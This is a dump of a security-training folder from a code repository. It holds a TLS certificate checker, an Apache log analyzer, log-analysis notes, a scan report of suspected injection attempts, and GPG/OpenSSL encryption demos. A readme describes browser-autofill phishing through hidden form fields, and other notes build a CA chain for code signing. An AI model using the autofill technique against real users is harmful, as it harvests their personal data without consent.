38 | dns_name.append(str(component.getComponent())) 39 | return dns_name 40 | 41 | color = { 42 | False: "\033[31;1m", 43 | True: "\033[32;1m", 44 | 'end': "\033[0m", 45 | 'error': "\033[33;1m", 46 | } 47 | 48 | for server in sys.argv[1:]: 49 | ctx = OpenSSL.SSL.Context(ssl.PROTOCOL_TLSv1) 50 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 51 | x509 = None 52 | try: 53 | s.connect((server, 443)) 54 | cnx = OpenSSL.SSL.Connection(ctx, s) 55 | cnx.set_tlsext_host_name(server) 56 | cnx.set_connect_state() 57 | cnx.do_handshake() 58 | 59 | x509 = cnx.get_peer_certificate() 60 | s.close() 61 | except Exception as e: 62 | print "%30s: %s%s%s" % (server, color['error'], e, color['end']) 63 | continue 64 | 65 | issuer = x509.get_issuer() 66 | issuer_corp = x509.get_issuer().organizationName 67 | issuer_url = x509.get_issuer().organizationalUnitName 68 | issuer_x509 = x509.get_issuer().commonName 69 | 70 | server_name = x509.get_subject().commonName 71 | server_name_ok = server_name == server 72 | 73 | try: 74 | subjectAltNames = get_subj_alt_name(x509) 75 | except pyasn1.error.PyAsn1Error: 76 | subjectAltNames = [] 77 | server_name_alt_ok = server in subjectAltNames 78 | if server_name_alt_ok: 79 | server_name_alt = server 80 | elif len(subjectAltNames) == 0: 81 | server_name_alt = None 82 | else: 83 | server_name_alt = subjectAltNames[0] 84 | 85 | if len(subjectAltNames) > 1: 86 | server_name_alt += " (+%i)" % (len(subjectAltNames) - 1) 87 | 88 | now = datetime.now(pytz.utc) 89 | begin = datetime.strptime(x509.get_notBefore(), "%Y%m%d%H%M%SZ").replace(tzinfo=pytz.UTC) 90 | begin_ok = begin < now 91 | end = datetime.strptime(x509.get_notAfter(), "%Y%m%d%H%M%SZ").replace(tzinfo=pytz.UTC) 92 | end_ok = end > now 93 | 94 | print "%30s: %s%30s%s (alt: %s%30s%s) begin=%s%s%s end=%s%s%s issuer=%s" % (server, 95 | color[server_name_ok], server_name, color['end'], 96 | color[server_name_alt_ok], server_name_alt, color['end'], 97 | color[begin_ok], begin.strftime("%d.%m.%Y"), color['end'], 98 | color[end_ok], end.strftime("%d.%m.%Y"), color['end'], 99 | issuer_corp) 100 | print subjectAltNames 101 | -------------------------------------------------------------------------------- /trainings/Browser_auto-fill_security/autofill-demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/Browser_auto-fill_security/autofill-demo.gif -------------------------------------------------------------------------------- /trainings/Browser_auto-fill_security/readme.md: -------------------------------------------------------------------------------- 1 | # Browser Autofill Phishing 🐟 2 | 3 | This is a simple demonstration of form fields hidden from the user, but will be 4 | filled anyways when using the browser form autofill feature, which poses a 5 | security risk for users, unaware of giving their information to the website. 6 | 7 | ## Google Chrome behaviour 8 | 9 | Here's the demo in action on the Google Chrome Browser: 10 | 11 | ![Autofill Demo](autofill-demo.gif) 12 | 13 | ## Other browsers 14 | 15 | It works differently in some other browsers. For example: 16 | 17 | * In Safari, it will tell you all the data it is filling into the form, even 18 | if it isn't visible to you. 19 | 20 | * In Firefox, you have to right click an input field and then select an 21 | identity to use. So a Firefox user autofills each field. 22 | 23 | -------------------------------------------------------------------------------- /trainings/Hellman.txt: -------------------------------------------------------------------------------- 1 | Santhosh 2 | Baswa 3 | hellboy 4 | ctfs 5 | conferences 6 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Apache_Log_Analyzer.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/Log Analysis/Apache_Log_Analyzer.zip -------------------------------------------------------------------------------- /trainings/Log Analysis/Apache_Log_Analyzer/Apache_Final.py: -------------------------------------------------------------------------------- 1 | #Author: P3t3rp4rk3r 2 | #Team: r3b00t 3 | import re 4 | import os 5 | from geoip import geolite2 6 | os.system("figlet -t Apache Log Analyzer") 7 | print '\033[1m' + '\n\t\t\t\t\t\t\t\t\t\t\t\t -P3t3rp4rk3r' + '\033[0m' 8 | def parse_logs(): 9 | try: 10 | access_file=raw_input("Enter filename:") # Enter File Location 11 | f = open(access_file,'r') # Read the file 12 | print("[+] Accessing file ...!!!"+access_file) 13 | except IOError: 14 | print 'Log file does not exist' 15 | return 16 | log_regx = re.compile(r'(.*?) - - \[(.*?)\] "GET (.*?)HTTP\/1.\d" (\d+)') #Regular expression to parse logfile 17 | logs = f.readlines() 18 | logs_parsed = [] 19 | logs_parsed.append(['URL', 'Request', 'Country', 'Location (lat/long)']) #Append to list 20 | for l in logs: 21 | m = re.match(log_regx, str(l)) 22 | if m: 23 | print("[+] Extracting Information (200 OK) Requests...!!!") # Extracting 200 OK requests 24 | if m.group(4) == '200': 25 | row = [] 26 | try: 27 | ipmatch = geolite2.lookup(m.group(1)) 28 | except: 29 | ipmatch = None 30 | if ipmatch is not None: 31 | row.append(m.group(1)) 32 | row.append(m.group(3)) 33 | row.append(ipmatch.country) 34 | row.append(ipmatch.location) 35 | else: 36 | row.append(m.group(1)) 37 | row.append(m.group(3)) 38 | row.append('N/A') 39 | row.append('N/A') 40 | logs_parsed.append(row) 41 | #Non 200 requests are avoided 42 | #else: print l 43 | print_report(logs_parsed) 44 | def print_report(loglist): 45 | print("[+] Generate log_report.html ") # Genrate HTML Report 46 | f = open('log_report.html', 'w') 47 | f.write(""" 48 | 49 | 50 | Apache Log Report 51 | 52 | 53 | """) 54 | f.close() 55 | f = open('log_report.html', 'a') 56 | for l in loglist: 57 | if l[0] == 'URL': 58 | str1 = ''' 59 | 60 | 61 | 62 | 63 | ''' % (l[0], l[1], l[2], l[3]) 64 | f.write(str1) 65 | else: 66 | str1 = ''' 67 | 68 | 69 | 70 | 71 | ''' % (l[0], l[1], l[2], l[3]) 72 | f.write(str1) 73 | os.system("firefox log_report.html") # Open HTML Report in Google Chrome 74 | f.close() 75 | if __name__ == '__main__': 76 | # print "Processing Apache Log File\n\n" 77 | parse_logs() 78 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Bose/Linux for Infosec People.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/Log Analysis/Bose/Linux for Infosec People.txt -------------------------------------------------------------------------------- /trainings/Log Analysis/Bose/log_analysis_Intro.txt: -------------------------------------------------------------------------------- 1 | Log file: 2 | 3 | It contains a record of the events that indicates how the system processes were loaded. 4 | 5 | System Logs: 6 | system errors, warnings,startup messages, system changes, abnormal shutdowns 7 | 8 | Firewall Logs: 9 | Detect Unsuccessful logins 10 | suspecious outbound connections 11 | Packet analysis (Spoofing attacks) 12 | 13 | Routers & Network Device logs: 14 | logging events 15 | security alerts 16 | 17 | Example Log: IIS Server 18 | #Software: Microsoft Internet Information Services 6.0 19 | #Version: 1.0 20 | #Date: 2009-06-11 05:12:03 21 | #Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status 22 | 23 | 2009-06-11 05:12:02 W3SVC1893743816 192.168.1.109 GET / – 4677 – 192.168.1.109 Mozilla/4.0 (compatible;+MSIE+4.01;+Windows+NT;+MS+Search+5.0+Robot) 401 2 2148074254 24 | 25 | 26 | 141.156.21.1-255 27 | 28 | 29 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Bose/log_analysis_Intro1.txt: -------------------------------------------------------------------------------- 1 | cat – prints the content of a file in the terminal window 2 | 3 | cat /var/log/auth.log #Display File 4 | cat >test2 #Create File 5 | cat filename | more 6 | 7 | 8 | grep – searches and filters based on patterns 9 | 10 | dpkg –l | grep python #Search python string in dpkg packages 11 | ifconfig | grep –A 4 eth0 12 | ifconfig | grep -B 4 UP 13 | 14 | 15 | awk – can sort each row into fields and display only what is needed 16 | 17 | awk '{print;}' awk.txt 18 | awk '{print $2,$5;}' awk.txt 19 | awk '$1 >200' awk.txt 20 | awk '$4 ~/Technology/' awk.txt 21 | 22 | sed – performs find and replace functions 23 | sort – arranges outpu-t in an order 24 | uniq – compares adjacent lines and can report, filter or provide a count of duplicates 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /trainings/Log Analysis/Trainings_LogAnalysis_Linuxforinfosec.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/Log Analysis/Trainings_LogAnalysis_Linuxforinfosec.tar -------------------------------------------------------------------------------- /trainings/Log Analysis/access_log_scan_report_from_Thu_04_Aug_2016_22_01_43: -------------------------------------------------------------------------------- 1 | 2 | Simple Log File Analyzer 3 | 4 | Scan report for access_log on Thu the 04 Aug 2016, 22:01:43 5 | Hint: XSS attempt discovery feature might be a little bit buggy. 6 | 7 | 8 | Number of possible SQL injection attempts found: 0 9 | Number of possible local file inclusion attempts found: 0 10 | Number of possible remote file inclusion attempts found: 6 11 | Number of possible cross-site scripting attempts found: 4 12 | 13 | 14 | Details for the remote file inclusion attempts (line, log entry) 15 | ------------------------------------------------ 16 | {6402: '103.22.201.135 - - [06/May/2013:09:21:13 -0400] "GET / HTTP/1.1" 200 23503 "http://www.google.co.in/url?sa=f&rct=j&url=http://strategicsec.com/&q=http://strategicsec.com/&ei=R66HUaGXPM_trQft0oHgBw&usg=AFQjCNF3EtKMC4yI-N0yyOKhDtZp6QzFWw" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31 AlexaToolbar/alxg-3.1"\n', 163: '199.27.128.189 - - [05/May/2013:05:35:58 -0400] "GET /wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/ HTTP/1.1" 401 483 "http://strategicsec.com/wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/" "Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.289 Version/12.01"\n', 1353: '173.245.50.210 - - [05/May/2013:12:56:18 -0400] "GET /services/training-services/classroom/hacking-in-paradise/ HTTP/1.1" 200 49353 "http://www.google.com/url?source=web&url=http://strategicsec.com/services/training-services/classroom/hacking-in-paradise/" "Prismatic/1.0.4 CFNetwork/609.1.4 Darwin/13.0.0"\n', 1354: '173.245.50.210 - - [05/May/2013:12:56:21 -0400] "GET /services/training-services/classroom/hacking-in-paradise/ HTTP/1.1" 200 49352 "http://www.google.com/url?source=web&url=http://strategicsec.com/services/training-services/classroom/hacking-in-paradise/" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B142"\n', 4077: '103.22.201.245 - - [06/May/2013:02:33:35 -0400] "GET / HTTP/1.1" 200 23051 "http://www.google.co.in/url?sa=f&rct=j&url=http://strategicsec.com/&q=strategicsec.com&ei=vU6HUfSdLMiIrAeKwYDwDw&usg=AFQjCNGwDKoOaUJY5OhFkk1Wx8oooVNtIw" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31"\n', 1118: '199.27.128.189 - - [05/May/2013:11:44:32 -0400] "GET /wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/ HTTP/1.1" 401 483 "http://strategicsec.com/wp-login.php?redirect_to=http://strategicsec.com/capabilitybased-security-assessment-emulating-advanced-persistent-threat/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:11.0) Gecko/20100101 Firefox/11.0"\n'} 17 | 18 | 19 | Details for the cross-site scripting attempts (line, log entry) 20 | ------------------------------------------------ 21 | {4856: '103.22.200.229 - - [06/May/2013:06:38:52 -0400] "GET /tag/dealing-with-javascript-obfuscation/ HTTP/1.1" 200 24864 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"\n', 6620: '103.22.201.135 - - [06/May/2013:09:35:28 -0400] "GET /wp-content/plugins/1-click-retweetsharelike//alert.png HTTP/1.1" 200 481 "http://strategicsec.com/wp-admin/admin.php?page=cforms/cforms-options.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31 AlexaToolbar/alxg-3.1"\n', 4804: '103.22.201.135 - - [06/May/2013:06:35:52 -0400] "GET /wp-content/plugins/1-click-retweetsharelike//alert.png HTTP/1.1" 200 481 "http://strategicsec.com/wp-admin/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31 AlexaToolbar/alxg-3.1"\n', 8257: '173.245.62.99 - - [06/May/2013:11:09:36 -0400] "GET /tag/dealing-with-javascript-obfuscation/ HTTP/1.1" 200 27090 "-" "Mozilla/4.0 (compatible; MSIE; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)"\n'} 22 | 23 | 24 | -------------------------------------------------------------------------------- /trainings/Log Analysis/awk.txt: -------------------------------------------------------------------------------- 1 | 100 Thomas Manager Sales $5,000 2 | 200 Jason Developer Technology $5,500 3 | 300 Sanjay Sysadmin Technology $7,000 4 | 400 Nisha Manager Marketing $9,500 5 | 500 Randy DBA Technology $6,000 6 | -------------------------------------------------------------------------------- /trainings/Log Analysis/cisco.log: -------------------------------------------------------------------------------- 1 | *Sep 4 10:07:40.135: EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface IPv6-mpls, changed state to up 2 | *Sep 4 10:07:41.135: EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up 3 | *Sep 4 10:07:41.135: EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up 4 | *Sep 4 05:07:42.519 EST: %SSH-5-DISABLED: SSH 1.99 has been disabled 5 | *Sep 4 05:07:43.575 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback1, changed state to up 6 | *Sep 4 05:07:43.607 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback10, changed state to up 7 | *Sep 4 05:07:43.651 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Tunnel0, changed state to down 8 | *Sep 4 05:07:43.807 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface NVI0, changed state to up 9 | *Sep 4 05:07:44.679 EST: %LINK-5-CHANGED: Interface Tunnel0, changed state to administratively down 10 | *Sep 4 05:07:56.627 EST: %SYS-5-CONFIG_I: Configured from memory by console 11 | *Sep 4 05:07:57.203 EST: %SYS-5-RESTART: System restarted -- 12 | Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(15)T12, RELEASE SOFTWARE (fc3) 13 | Technical Support: http://www.cisco.com/techsupport 14 | Copyright (c) 1986-2010 by Cisco Systems, Inc. 15 | Compiled Fri 22-Jan-10 00:35 by prod_rel_team 16 | *Sep 4 05:07:57.203 EST: %SNMP-5-COLDSTART: SNMP agent on host R1 is undergoing a cold start 17 | *Sep 4 05:07:57.259 EST: %SSH-5-ENABLED: SSH 1.99 has been enabled 18 | *Sep 4 05:07:57.535 EST: %LINK-3-UPDOWN: Interface Virtual-Access1, changed state to up 19 | *Sep 4 05:07:58.903 EST: %LINEPROTO-5-UPDOWN: Line protocol on Interface Virtual-Access1, changed state to up 20 | Sep 6 11:57:00.021 EST: %DHCPD-4-PING_CONFLICT: DHCP address conflict: server pinged 192.168.1.42. 21 | Sep 14 11:44:51.710 EST: %DHCPD-4-PING_CONFLICT: DHCP address conflict: server pinged 192.168.1.249. 22 | Sep 20 18:06:27.586 EST: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (192.168.1.50) 23 | Sep 20 18:07:37.735 EST: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (192.168.1.50) 24 | -------------------------------------------------------------------------------- /trainings/Log Analysis/cisco_loganalysis.txt: -------------------------------------------------------------------------------- 1 | we will print $5. Only the last 4 lines are being shown for brevity. 2 | 3 | cat cisco.log | awk '{print $5}' | tail -n 4 4 | 5 | Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order. 6 | 7 | cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn 8 | 9 | 10 | -------------------------------------------------------------------------------- /trainings/Log Analysis/log_analysis_Intro.txt: -------------------------------------------------------------------------------- 1 | Log file: 2 | 3 | It contains a record of the events that indicates how the system processes were loaded. 4 | 5 | System Logs: 6 | system errors, warnings,startup messages, system changes, abnormal shutdowns 7 | 8 | Firewall Logs: 9 | Detect Unsuccessful logins 10 | suspecious outbound connections 11 | Packet analysis (Spoofing attacks) 12 | 13 | Routers & Network Device logs: 14 | logging events 15 | security alerts 16 | 17 | Example Log: IIS Server 18 | #Software: Microsoft Internet Information Services 6.0 19 | #Version: 1.0 20 | #Date: 2009-06-11 05:12:03 21 | #Fields: date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status 22 | 23 | 2009-06-11 05:12:02 W3SVC1893743816 192.168.1.109 GET / – 4677 – 192.168.1.109 Mozilla/4.0 (compatible;+MSIE+4.01;+Windows+NT;+MS+Search+5.0+Robot) 401 2 2148074254 24 | 25 | 26 | 141.156.21.1-255 27 | 28 | 29 | -------------------------------------------------------------------------------- /trainings/Log Analysis/log_analysis_Intro1.txt: -------------------------------------------------------------------------------- 1 | cat – prints the content of a file in the terminal window 2 | 3 | cat /var/log/auth.log #Display File 4 | cat >test2 #Create File 5 | cat filename | more 6 | 7 | 8 | grep – searches and filters based on patterns 9 | 10 | dpkg –l | grep python #Search python string in dpkg packages 11 | ifconfig | grep –A 4 eth0 12 | ifconfig | grep -B 4 UP 13 | 14 | 15 | awk – can sort each row into fields and display only what is needed 16 | 17 | awk '{print;}' awk.txt 18 | awk '{print $2,$5;}' awk.txt 19 | awk '$1 >200' awk.txt 20 | awk '$4 ~/Technology/' awk.txt 21 | 22 | sed – performs find and replace functions 23 | sort – arranges outpu-t in an order 24 | uniq – compares adjacent lines and can report, filter or provide a count of duplicates 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /trainings/Log Analysis/soc.txt: -------------------------------------------------------------------------------- 1 | santhosh 2 | soc engineer 3 | netenrich 4 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/file-enc-pubkey.txt: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP PUBLIC KEY BLOCK----- 2 | Version: GnuPG v1 3 | 4 | mQENBFd2py8BCACp85eS6bF9ap7xbBBpF3rJ40ApbcadQh91PUGGqVwrkp6/R7cZ 5 | HpSVCPtkykC+I1KBzSvxOP+3ohxDG/eyoQxtlmF6bDcAHWxa4DiHuW3yPlTa+siM 6 | pgBPdUm4Bg6UcHijueDV2i5TECPfND4eGKfWYIa++/fuhzIwBmMG1X+FGViw2sc9 7 | WEKxYkcvmbCYZt+nliGisipWf3fXf5yXWBoIdO4bOZTOoGPoH3iwJBDdEjmfm5PF 8 | XIVX9IHXnb8TOzaLZkP4nUy6EA811KAkWdOzEywPMpfeq30qkAhqqXfamjsTqUAj 9 | wiV8Q5Rtbl5qiOo8Va3cpZtDfv/llCBlnXUnABEBAAG0RlNhbnRob3NoIEJhc3dh 10 | IChBc3ltZXRyaWMgQ3J5cHRvZ3JhcGh5KSA8c2FudGhvc2guYmFzd2FAbmV0ZW5y 11 | aWNoLmNvbT6JATgEEwECACIFAld2py8CGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4B 12 | AheAAAoJEBeSOKHHO1Zn4LMH/RgTTX6up2/46dsgLwc1ILAda5xdDVS1RSoG6oY1 13 | ANxYNzoWSB36VUMiV4iYWQEEvBH0ebk4gu/igVDaoVV1DM+u2jd5aCCvzcm5jrzK 14 | tV0iChNGcEx+ChEWoITWfHnDtB5iRY5MpJvkMplIjj296mjI9CNawvecl7w50Dh4 15 | nOjwYuuuGwptuWuvjCxoZ4F1wOtL/vt/ZYcUvtv8X9R3VBDrl21YhXoLJb43ZqB5 16 | Ffol5nIVPvaPBLXh8gB/FlDP6j6/Py/rnQSOLwUNwTk7GdvozhEcfItcZLltp/VE 17 | 0qvFCpBFjsYHSQ79DwCMcZbo183RrIvmuCzcXL1+q3FGoAS5AQ0EV3anLwEIAM7s 18 | NY1f/SGgZEkxI7Ov55ft581wmUQUI555wU5f0+NW85dW9ooS8ckbVczhOQtwq716 19 | plKJNsZ0akbZ6mE2EA05QsEzDeArSdcBZ8rjRL6ddrJ/qZ8RF1w/g035lKu1NgNI 20 | lrD2n20Nt0Fabi0fMvpVCMaSxBON83kbgC3IDIY5/+FiEnihi+IYJ/fdQjDrSbS2 21 | si2aimsIXbPuKo7hj7Wg3CCNmaF9h2X9Y2y2wPaytBuUVMKY61MyBg869KdNzvqp 22 | DRKkvP60sejaa3JEPtQNLrZz+7Cz5gWkJ3jgab4eOcTXdGfjQSTL2xMeowWNfHC9 23 | +seAAYGEnBjFZ40sELUAEQEAAYkBHwQYAQIACQUCV3anLwIbDAAKCRAXkjihxztW 24 | Zz48B/9qI0859iUcNfaiPEjKSJl5ACaQNnTGReDgevegYhmPUocY8kghbnMLAiQ3 25 | CAVJCa7qzUIwRLMvYkAc+ms4JTP9CF9HdH095E5r1vAPlTobz9QzIdnXQ5qP95jL 26 | U4peNXIyhBfzvGUA0ANKfrTiJL/pvDFKdFRZUQmCboBMAvMS3lQ4Pv4tbLsI1Iq8 27 | SenL817ci9kmsNhasRmwf4SM2KpDHwUfS4uyZzfTjvZ554MJ/XXZ32CzZXATs9M9 28 | miXU/qKWEg6z2e/ggOinXqkCFx76av3m71SSbJVafkyvvKmtWFZr2tT8NBKoerau 29 | lPhM06xCj82BmxyUuF20OkWyCZ5n 30 | =MMD2 31 | -----END PGP PUBLIC KEY BLOCK----- 32 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/files.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/assmetrickey/files.tar.gz -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell.txt: -------------------------------------------------------------------------------- 1 | hello 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell1.txt: -------------------------------------------------------------------------------- 1 | Goodbye 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell2.txt: -------------------------------------------------------------------------------- 1 | Green 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell22.txt: -------------------------------------------------------------------------------- 1 | Green 2 | -------------------------------------------------------------------------------- /trainings/crypto/assmetrickey/hell3.txt: -------------------------------------------------------------------------------- 1 | blue 2 | -------------------------------------------------------------------------------- /trainings/crypto/encryption_demo.txt: -------------------------------------------------------------------------------- 1 | #################### 2 | # MD5 Hashing Demo # 3 | #################### 4 | mkdir ~/demo 5 | cd ~/demo 6 | 7 | 8 | 9 | mkdir hashdemo 10 | cd hashdemo 11 | echo test > test.txt 12 | cat test.txt 13 | md5sum test.txt 14 | echo hello >> test.txt 15 | cat test.txt 16 | md5sum test.txt 17 | cd .. 18 | 19 | 20 | 21 | ################################# 22 | # Symmetric Key Encryption Demo # 23 | ################################# 24 | md5sum test.txt 25 | mkdir gpgdemo 26 | cd gpgdemo 27 | echo test > test.txt 28 | cat test.txt 29 | gpg -c test.txt 30 | password 31 | password 32 | ls | grep test 33 | cat test.txt 34 | cat test.txt.gpg 35 | rm -rf test.txt 36 | ls | grep test 37 | gpg -o output.txt test.txt.gpg 38 | 39 | 40 | ################################## 41 | # Asymmetric Key Encryption Demo # 42 | ################################## 43 | 44 | sudo apt-get install rng-tools 45 | 46 | /etc/init.d/rng-tools start 47 | 48 | sudo rngd -r /dev/urandom 49 | santhosh 50 | 51 | 52 | echo hello > file1.txt 53 | echo goodbye > file2.txt 54 | echo green > file3.txt 55 | echo blue > file4.txt 56 | 57 | tar czf files.tar.gz *.txt 58 | 59 | gpg --gen-key 60 | 1 61 | 1024 62 | 0 63 | y 64 | Hellboy reboot 65 | Hellboy@reboot.com 66 | --blank comment-- 67 | O 68 | password 69 | password 70 | 71 | 72 | 73 | gpg --armor --output file-enc-pubkey.txt --export 'Hellboy reboot' 74 | 75 | cat file-enc-pubkey.txt 76 | 77 | gpg --armor --output file-enc-privkey.asc --export-secret-keys 'Hellboy reboot' 78 | 79 | cat file-enc-privkey.asc 80 | 81 | gpg --encrypt --recipient 'Hellboy reboot' files.tar.gz 82 | 83 | rm -rf files.tar.gz *.txt 84 | 85 | tar -zxvf files.tar.gz.gpg 86 | 87 | gpg --output output.tar.gz --decrypt files.tar.gz.gpg 88 | password 89 | 90 | tar -zxvf output.tar.gz 91 | 92 | 93 | ############################ 94 | # Encryption using OpenSSL # 95 | ############################ 96 | openssl genrsa -out private_key.pem 1024 97 | openssl rsa -in private_key.pem -out public_key.pem -outform PEM -pubout 98 | 99 | 100 | echo hello > encrypt.txt 101 | openssl rsautl -encrypt -inkey public_key.pem -pubin -in encrypt.txt -out encrypt.dat 102 | 103 | cat encrypt.dat 104 | 105 | rm -rf encrypt.dat 106 | 107 | openssl rsautl -decrypt -inkey private_key.pem -in encrypt.dat -out decrypt.txt 108 | 109 | cat decrypt.txt 110 | -------------------------------------------------------------------------------- /trainings/crypto/gpgdemo/hell.txt.gpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/gpgdemo/hell.txt.gpg -------------------------------------------------------------------------------- /trainings/crypto/gpgdemo/out.txt: -------------------------------------------------------------------------------- 1 | test 2 | -------------------------------------------------------------------------------- /trainings/crypto/hash.py: -------------------------------------------------------------------------------- 1 | #Author: P3t3rp4rk3r 2 | #Access Code: 3 | # Training Session 4 | 5 | import hashlib 6 | print "[+] Hashing [+]" 7 | msg = raw_input("Enter the Message:") 8 | print "[+] List of Hashs " 9 | print hashlib.algorithms 10 | a = raw_input("Enter the Hash:") 11 | h = hashlib.new(a) 12 | h.update(msg) 13 | print "[+]"+a+"sum:"+h.hexdigest() 14 | print "[+] Execution done." 15 | 16 | -------------------------------------------------------------------------------- /trainings/crypto/hashdemo/hell.txt: -------------------------------------------------------------------------------- 1 | test 2 | hello 3 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/a.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/openssl/aes/a.enc -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/a.txt: -------------------------------------------------------------------------------- 1 | Santhosh Baswa 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/intro.txt: -------------------------------------------------------------------------------- 1 | openssl aes-256-cbc -in attack-plan.txt -out message.enc 2 | 3 | openssl aes-256-cbc -d -in message.enc -out plain-text.txt 4 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/intro.txt~: -------------------------------------------------------------------------------- 1 | openssl aes-256-cbc -in attack-plan.txt -out message.enc 2 | 3 | openssl aes-256-cbc -d -in message.enc -out plain-text.txt 4 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/aes/output.txt: -------------------------------------------------------------------------------- 1 | Santhosh Baswa 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/ca/intro.txt: -------------------------------------------------------------------------------- 1 | Generate root CA and Store as a ca.key 2 | 3 | openssl genrsa -out ca.key 4096 4 | 5 | create selfsigned root CA ca.crt 6 | 7 | openssl req -new -x509 -days 1826 -key ca.key -out ca.crt 8 | 9 | generate subordinate CA 10 | 11 | openssl genrsa -out ia.key 4096 12 | 13 | request a certificate for this subordinate CA 14 | 15 | openssl req -new -key ia.key -out ia.csr 16 | 17 | subordinate CA cert and get it signed by the root CA 18 | 19 | openssl x509 -req -days 730 -in ia.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out ia.crt 20 | 21 | subordinate cA key for authenticatecode signature with microsoft signtool , pkcs12 file. 22 | 23 | openssl pkcs12 -export -out ia.p12 -inkey ia.key -in ia.crt -chain -CAfile ca.crt 24 | 25 | PE file generated : ia.p12 26 | 27 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/ca/intro.txt~: -------------------------------------------------------------------------------- 1 | Generate root CA and Store as a ca.key 2 | 3 | openssl genrsa -out ca.key 4096 4 | 5 | create selfsigned root CA ca.crt 6 | 7 | openssl req -new -x509 -days 1826 -key ca.key -out ca.crt 8 | 9 | generate subordinate CA 10 | 11 | openssl genrsa -out ia.key 4096 12 | 13 | request a certificate for this subordinate CA 14 | 15 | openssl req -new -key ia.key -out ia.csr 16 | 17 | subordinate CA cert and get it signed by the root CA 18 | 19 | openssl x509 -req -days 730 -in ia.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out ia.crt 20 | 21 | subordinate cA key for authenticatecode signature with microsoft signtool , pkcs12 file. 22 | 23 | openssl pkcs12 -export -out ia.p12 -inkey ia.key -in ia.crt -chain -CAfile ca.crt 24 | 25 | PE file 